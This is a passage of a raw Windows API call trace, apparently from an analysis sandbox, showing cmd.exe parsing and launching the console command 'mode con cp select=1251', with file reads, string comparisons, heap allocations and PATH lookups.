lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e338, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e340, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.635] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.635] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e342, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0263.635] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.636] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.636] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.636] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e344, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0263.636] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.636] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.636] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.636] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e346, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0263.636] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.636] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.636] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.636] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e348, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0263.636] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.636] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.636] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.636] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0263.636] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.636] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.636] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.636] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0263.636] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.636] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.636] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0263.636] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0263.636] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.637] GetFileType (hFile=0xe8) returned 0x3 [0263.637] _get_osfhandle (_FileHandle=0) returned 0xe8 [0263.637] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0263.637] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.637] GetFileType (hFile=0xf4) returned 0x3 [0263.637] _get_osfhandle (_FileHandle=1) returned 0xf4 [0263.637] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0263.637] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x26fa68, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26fa68*=0x18, lpOverlapped=0x0) returned 1 [0263.637] GetProcessHeap () returned 0x2d0000 [0263.637] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4012) returned 0x2eb310 [0263.637] GetProcessHeap () returned 0x2d0000 [0263.637] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb310 | out: hHeap=0x2d0000) returned 1 [0263.637] _wcsicmp (_String1="mode", _String2=")") returned 68 [0263.637] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0263.637] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0263.637] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0263.637] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0263.637] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0263.637] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0263.637] GetProcessHeap () returned 0x2d0000 [0263.637] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0) returned 0x2e9840 [0263.637] GetProcessHeap () returned 0x2d0000 [0263.637] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1a) returned 0x2e4630 [0263.638] GetProcessHeap () returned 0x2d0000 [0263.638] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x38) returned 0x2e6550 [0263.638] GetConsoleOutputCP () returned 0x1b5 [0263.640] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a19bfe0 | out: lpCPInfo=0x4a19bfe0) returned 1 [0263.640] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0263.640] GetConsoleTitleW (in: lpConsoleTitle=0x26fa20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.640] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0263.640] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0263.640] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0263.640] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0263.640] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0263.640] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0263.640] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0263.640] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0263.640] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0263.640] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0263.641] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0263.641] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0263.641] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0263.641] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0263.641] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0263.641] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0263.641] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0263.641] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0263.641] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0263.641] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0263.641] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0263.641] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0263.641] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0263.641] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0263.641] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0263.641] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0263.641] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0263.641] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0263.641] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0263.641] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0263.641] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0263.641] _wcsicmp (_String1="mode", _String2="START") returned -6 [0263.641] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0263.641] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0263.641] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0263.641] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0263.641] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0263.641] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0263.641] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0263.641] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0263.641] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0263.641] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0263.641] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0263.641] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0263.641] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0263.641] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0263.641] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0263.641] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0263.641] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0263.641] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0263.641] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0263.641] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0263.642] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0263.642] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0263.642] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0263.642] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0263.642] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0263.642] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0263.642] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0263.642] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0263.642] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0263.642] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0263.642] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0263.642] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0263.642] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0263.642] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0263.642] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0263.642] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0263.642] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0263.642] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0263.642] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0263.642] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0263.642] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0263.642] _wcsicmp (_String1="mode", _String2="START") returned -6 [0263.642] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0263.642] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0263.642] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0263.642] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0263.642] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0263.642] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0263.642] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0263.642] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0263.642] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0263.642] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0263.642] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0263.642] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0263.642] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0263.642] GetProcessHeap () returned 0x2d0000 [0263.643] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2eaae0 [0263.643] GetProcessHeap () returned 0x2d0000 [0263.643] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x42) returned 0x2e9900 [0263.643] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0263.643] GetProcessHeap () returned 0x2d0000 [0263.643] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x420) returned 0x2eb310 [0263.643] SetErrorMode (uMode=0x0) returned 0x0 [0263.643] SetErrorMode (uMode=0x1) returned 0x0 [0263.643] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2eb320, lpFilePart=0x26f2b0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f2b0*="system32") returned 0x13 [0263.643] SetErrorMode (uMode=0x0) returned 0x1 [0263.643] GetProcessHeap () returned 0x2d0000 [0263.643] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2eb310, Size=0x42) returned 0x2eb310 [0263.643] GetProcessHeap () returned 0x2d0000 [0263.643] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb310) returned 0x42 [0263.643] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0263.643] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0263.643] GetProcessHeap () returned 0x2d0000 [0263.643] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x104) returned 0x2e5bb0 [0263.643] GetProcessHeap () returned 0x2d0000 [0263.643] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x1f8) returned 0x2e9c60 [0263.649] GetProcessHeap () returned 0x2d0000 [0263.649] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e9c60, Size=0x106) returned 0x2e9c60 [0263.649] GetProcessHeap () returned 0x2d0000 [0263.649] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e9c60) returned 0x106 [0263.649] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0263.649] GetProcessHeap () returned 0x2d0000 [0263.649] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe8) returned 0x2e9d80 [0263.649] GetProcessHeap () returned 0x2d0000 [0263.649] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e9d80, Size=0x7e) returned 0x2e9d80 [0263.649] GetProcessHeap () returned 0x2d0000 [0263.649] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e9d80) returned 0x7e [0263.651] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0263.651] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x26f020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f020) returned 0x2e5cc0 [0263.652] GetProcessHeap () returned 0x2d0000 [0263.652] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2e4660 [0263.652] FindClose (in: hFindFile=0x2e5cc0 | out: hFindFile=0x2e5cc0) returned 1 [0263.652] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x26f020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f020) returned 0x2e5cc0 [0263.652] GetProcessHeap () returned 0x2d0000 [0263.652] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e4660, Size=0x8) returned 0x2e9950 [0263.652] FindClose (in: hFindFile=0x2e5cc0 | out: hFindFile=0x2e5cc0) returned 1 [0263.652] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0263.652] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0263.652] GetConsoleTitleW (in: lpConsoleTitle=0x26f570, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.652] GetProcessHeap () returned 0x2d0000 [0263.652] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x21c) returned 0x2eb370 [0263.652] GetConsoleTitleW (in: lpConsoleTitle=0x2eb380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.652] GetProcessHeap () returned 0x2d0000 [0263.652] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2eb370, Size=0x8a) returned 0x2eb370 [0263.652] GetProcessHeap () returned 0x2d0000 [0263.652] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb370) returned 0x8a [0263.652] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0263.653] GetProcessHeap () returned 0x2d0000 [0263.653] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb370 | out: hHeap=0x2d0000) returned 1 [0263.653] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f328, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f2e8 | out: lpAttributeList=0x26f328, lpSize=0x26f2e8) returned 1 [0263.653] UpdateProcThreadAttribute (in: lpAttributeList=0x26f328, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f2d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f328, lpPreviousValue=0x0) returned 1 [0263.653] GetStartupInfoW (in: lpStartupInfo=0x26f440 | out: lpStartupInfo=0x26f440*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0263.653] GetProcessHeap () returned 0x2d0000 [0263.653] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2e4660 [0263.653] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0263.653] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0263.653] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0263.653] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0263.653] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0263.653] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0263.653] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0263.653] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0263.654] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0263.654] GetProcessHeap () returned 0x2d0000 [0263.654] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e4660 | out: hHeap=0x2d0000) returned 1 [0263.654] GetProcessHeap () returned 0x2d0000 [0263.654] RtlAllocateHeap 